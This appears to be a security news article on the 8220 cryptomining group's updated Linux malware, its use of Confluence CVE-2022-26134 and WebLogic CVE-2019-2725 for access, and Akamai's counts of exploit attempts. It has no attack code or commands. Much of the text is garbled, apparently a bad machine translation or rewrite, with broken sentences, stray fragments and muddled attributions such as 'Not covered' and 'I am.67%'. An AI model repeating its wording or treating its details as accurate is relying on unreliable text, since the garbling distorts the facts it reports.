The Cloud Threat Actors Group, tracked as 8220, has updated its malware toolset to compromise Linux servers with the aim of installing crypto miners as part of a long-term campaign.
“The update includes the deployment of new versions of crypto miners and IRC bots.” Microsoft Security Intelligence Said With a series of tweets on Thursday. “This group actively updated its technology and payload last year.”
8220, active since Early 2017Named because it is a Chinese-speaking Monero mining threat actor and prefers to communicate with command and control (C2) servers over port 8220. He is also the developer of a tool called whatMiner. the Lock Cybercrime groups in their attacks.
Alibaba Cloud Security Team, July 2019 Not covered Further modify the enemy’s tactics, noting that they use rootkits to hide the mining program. Two years later, the gang Resurface In the tsunami IRC botnet Variants and custom “PwnRig” miners.
According to Microsoft, the latest campaign to attack i686 and x86_64 Linux systems has announced a newly disclosed Atlassian Confluence Server (CVE-2022-26134) And Oracle WebLogic (CVE-2019-2725) For initial access.
This procedure succeeds by getting the malware loader from a remote server designed to drop PwnRig miners and IRC bots, but detects it by clearing the log files and disabling cloud monitoring and security software. Not before performing the steps to avoid.
In addition to achieving persistence with cron jobs, “The loader uses the IP port scanner tool” masscan “to search for other SSH servers in the network and uses the GoLang-based SSH brute force tool” spirit “. And propagate, “Microsoft said.
Survey results are provided as Akamai clearly A flaw in Atlassian Confluence indicates that we have witnessed steady 20,000 exploit attempts per day starting from about 6,000 IPs, starting at the peak of 100,000 shortly after the bug disclosure on June 2, 2022. I am.67% of attacks originated from the United States
“At the forefront, commerce accounts for 38% of offensive activity, followed by high-tech and financial services, respectively,” said Chen Doytshman of Akamai this week. “These top three industries account for more than 75% of our activities.”
According to cloud security companies, attacks range from investigating vulnerabilities to determining whether a targeted system is vulnerable to malware injections such as web shells and crypto miners.
“Of particular concern is how much this attack type has shifted upwards in the last few weeks,” Doytshman added. “As we saw in a similar vulnerability, this CVE-2022-26134 could continue to be exploited for at least the next few years.”
